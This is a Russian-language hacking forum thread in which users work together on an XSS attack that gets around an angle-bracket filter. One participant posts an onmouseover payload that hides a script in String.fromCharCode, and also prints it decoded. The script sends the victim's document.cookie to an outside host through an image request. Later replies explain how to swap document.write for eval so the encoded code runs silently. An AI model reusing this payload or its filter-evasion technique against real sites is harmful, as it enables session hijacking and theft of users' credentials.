11.02.2014, 20:56
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
С нами:
7345046
Репутация:
0
|
|
Сообщение от psihoz26
попробуй кормить скрипту ссылку на js файл в котором и будет нужный код
Через document.location.href?
|
|
|
12.02.2014, 16:23
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Сообщение от Seller Zeus
Seller Zeus said:
Через document.location.href?
Зачем?
http://example.com/script.js замени на адрес своего js файла
|
|
|
|
12.02.2014, 16:24
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
С нами:
7345046
Репутация:
0
|
|
Сообщение от psihoz26
Зачем?
http://example.com/script.js замени на адрес своего js файла
угловые скобки фильтруются...
|
|
|
|
12.02.2014, 19:15
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
А на это как реагирует ?
Код:
onmouseover=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,107,114,105,114,109,105,110,97,108,97,46,110,101,116,47,115,110,102,47,115,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62));
ЗЫ: Там
Код:
img=new Image();img.src="http://krirminala.net/snf/s.gif?"+document.cookie;
|
|
|
|
13.02.2014, 18:11
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
С нами:
7345046
Репутация:
0
|
|
Сообщение от Inoms
А на это как реагирует ?
Код:
onmouseover=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,107,114,105,114,109,105,110,97,108,97,46,110,101,116,47,115,110,102,47,115,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62));
ЗЫ: Там
Код:
img=new Image();img.src="http://site.net/snf/s.gif?"+document.cookie;
Спасибо, а как сделать чтобы на пустую страницу не редеректило?
|
|
|
|
13.02.2014, 20:26
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
document.write убрать и далее снова перекодировать js, без тегов script и собственно, евалить. Но в этом случаи, как ранее говорилось, запрос придёт в негодность ?
|
|
|
|
13.02.2014, 20:28
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
С нами:
7345046
Репутация:
0
|
|
Сообщение от Inoms
document.write убрать и далее снова перекодировать js, без тегов script и собственно, евалить. Но в этом случаи, как ранее говорилось, запрос придёт в негодность ?
Ну так он и щас без тегов script.
|
|
|
|
13.02.2014, 20:31
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Эти теги закатаны в String.fromCharCode и далее записываются на страницу.
|
|
|
|
13.02.2014, 20:32
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
С нами:
7345046
Репутация:
0
|
|
Сообщение от Inoms
Эти теги закатаны в String.fromCharCode и далее записываются на страницу.
Вообщем вы предлагаете вместо document.write написать eval(); ?
|
|
|
|
13.02.2014, 20:42
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Если этого не сделать, всё то, что вернет String.fromCharCode будет текст, который даже нигде не будет показан)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
